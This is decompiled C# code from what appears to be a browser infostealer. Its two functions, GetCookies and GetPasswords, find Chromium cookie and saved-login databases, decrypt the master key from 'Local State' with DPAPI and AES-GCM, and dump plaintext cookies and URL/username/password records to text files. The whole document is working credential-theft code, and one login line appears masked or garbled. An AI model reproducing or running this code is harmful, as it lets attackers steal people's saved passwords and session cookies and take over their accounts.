// Token: 0x0600002A RID: 42 RVA: 0x00007340 File Offset: 0x00005540 public static void GetCookies(string path2save) { try { List <string> list = new List <string>(); List <string> list2 = new List <string>(); list2.Add(Help.AppDate); list2.Add(Help.LocalData); List <string> list3 = new List <string>(); foreach (string path in list2) { try { list3.AddRange(Directory.GetDirectories(path)); } catch { } } foreach (string text in list3) { string text2 = ""; string[] array = null; try { list.AddRange(Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories)); array = Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories); } catch { } if (array != null) { foreach (string text3 in array) { try { if (File.Exists(text3)) { string text4 = "Unknown"; foreach (string text5 in Chromium.BrowsersName) { if (text.Contains(text5)) { text4 = text5; } } string sourceFileName = text3; string sourceFileName2 = text3 + "\\..\\..\\Local State"; if (File.Exists(Chromium.bd)) { File.Delete(Chromium.bd); } if (File.Exists(Chromium.ls)) { File.Delete(Chromium.ls); } File.Copy(sourceFileName, Chromium.bd); File.Copy(sourceFileName2, Chromium.ls); SqlHandler sqlHandler = new SqlHandler(Chromium.bd); new List <PassData>(); sqlHandler.ReadTable("cookies"); string text6 = File.ReadAllText(Chromium.ls); string[] array4 = Regex.Split(text6, "\""); int num = 0; string[] array3 = array4; for (int j = 0; j < array3.Length; j++) { if (array3[j] == "encrypted_key") { text6 = array4[num + 2]; break; } num++; } byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null); int rowCount = sqlHandler.GetRowCount(); for (int k = 0; k < rowCount; k++) { try { string value = sqlHandler.GetValue(k, 12); byte[] bytes = Encoding.Default.GetBytes(value); try { string text7; if (value.StartsWith("v10")) { byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>(); text7 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv); } else { text7 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null)); } string value2 = sqlHandler.GetValue(k, 1); string value3 = sqlHandler.GetValue(k, 2); string value4 = sqlHandler.GetValue(k, 4); string value5 = sqlHandler.GetValue(k, 5); string value6 = sqlHandler.GetValue(k, 6); text2 += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", new object[] { value2, value4, value6.ToUpper(), value5, value3, text7 }); Chromium.Cookies++; } catch { } } catch { } } if (File.Exists(Chromium.bd)) { File.Delete(Chromium.bd); } if (File.Exists(Chromium.ls)) { File.Delete(Chromium.ls); } if (text4 == "Unknown") { File.AppendAllText(path2save + "\\Cookies_" + text4 + ".txt", text2); } else { File.WriteAllText(path2save + "\\Cookies_" + text4 + ".txt", text2); } } } catch { } } } } } catch { } }
// Token: 0x06000028 RID: 40 RVA: 0x00006A28 File Offset: 0x00004C28 public static void GetPasswords(string path2save) { try { List <string> list = new List <string>(); List <string> list2 = new List <string>(); list2.Add(Help.AppDate); list2.Add(Help.LocalData); List <string> list3 = new List <string>(); foreach (string path in list2) { try { list3.AddRange(Directory.GetDirectories(path)); } catch { } } foreach (string text in list3) { string[] array = null; string text2 = ""; try { list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories)); array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories); } catch { } if (array != null) { foreach (string text3 in array) { try { if (File.Exists(text3)) { string text4 = "Unknown"; foreach (string text5 in Chromium.BrowsersName) { if (text.Contains(text5)) { text4 = text5; } } string sourceFileName = text3; string sourceFileName2 = text3 + "\\..\\..\\Local State"; if (File.Exists(Chromium.bd)) { File.Delete(Chromium.bd); } if (File.Exists(Chromium.ls)) { File.Delete(Chromium.ls); } File.Copy(sourceFileName, Chromium.bd); File.Copy(sourceFileName2, Chromium.ls); SqlHandler sqlHandler = new SqlHandler(Chromium.bd); new List <PassData>(); sqlHandler.ReadTable("logins"); string text6 = File.ReadAllText(Chromium.ls); string[] array4 = Regex.Split(text6, "\""); int num = 0; string[] array3 = array4; for (int j = 0; j < array3.Length; j++) { if (array3[j] == "encrypted_key") { text6 = array4[num + 2]; break; } num++; } byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null); int rowCount = sqlHandler.GetRowCount(); for (int k = 0; k < rowCount; k++) { try { string value = sqlHandler.GetValue(k, 5); byte[] bytes = Encoding.Default.GetBytes(value); string str = ""; try { if (value.StartsWith("v10") || value.StartsWith("v11")) { byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>(); str = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv); } else { str = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null)); } } catch { } text2 = text2 + "Url: " + sqlHandler.GetValue(k, 1) + "\r\n"; text2 = text2 + "Login: "******"\r\n"; text2 = text2 + "Passwords: " + str + "\r\n"; text2 = text2 + "Browser: " + text4 + "\r\n\r\n"; Chromium.Passwords++; } catch { } } if (File.Exists(Chromium.bd)) { File.Delete(Chromium.bd); } if (File.Exists(Chromium.ls)) { File.Delete(Chromium.ls); } if (text4 == "Unknown") { File.AppendAllText(path2save + "\\Passwords_" + text4 + ".txt", text2); } else { File.WriteAllText(path2save + "\\Passwords_" + text4 + ".txt", text2); } } } catch { } } } } } catch { } }